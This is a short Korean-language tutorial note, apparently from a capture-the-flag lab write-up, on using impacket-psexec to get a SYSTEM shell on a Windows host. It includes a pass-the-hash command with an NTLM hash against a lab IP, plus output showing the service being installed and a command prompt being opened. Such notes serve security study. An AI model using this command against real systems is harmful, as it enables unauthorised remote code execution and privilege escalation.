1. 개요
psexec 는 SYSTEM 권한을 주는 권한으로 wmiexec 혹은 evil-winrm 으로 administrator 로 로그인을 할 수는 있지만 SYSTEM 권한을 획득하고 싶을 때 사용한다.
SMB(445) 포트만 열려있으면 사용이 가능하고, 가장 확실하고 빠르게 작동한다는 장점이 있다.
하지만 psexec 는 상대방 컴퓨터에 서비스를 설치하고 실행 파일을 업로드해야 하기 때문에 탐지율이 높다. 이 과정에서 백신에게 탐지될 확률이 높다.
여기서 상대방 컴퓨터에 서비스 설치는 psexec.py 가 자동으로 하고 알아서 지우기 때문에 공격자가 신경쓰지 안ㅇ하도 되며, 명령어가 실행되는 것처럼 느껴진다. 아래의 사용법에 보면 Uploading file bYawFNxL.exe 와 같은 문구를 확인할 수 있는데 이 부분이 서비스를 설치하는 과정을 의미한다.
2. 사용법
┌──(root㉿kali)-[/home/kali/labs/sauna]
└─# impacket-psexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.129.33.94 administrator@10.129.33.94
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.33.94.....
[*] Found writable share ADMIN$
[*] Uploading file bYawFNxL.exe
[*] Opening SVCManager on 10.129.33.94.....
[*] Creating service uSFx on 10.129.33.94.....
[*] Starting service uSFx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>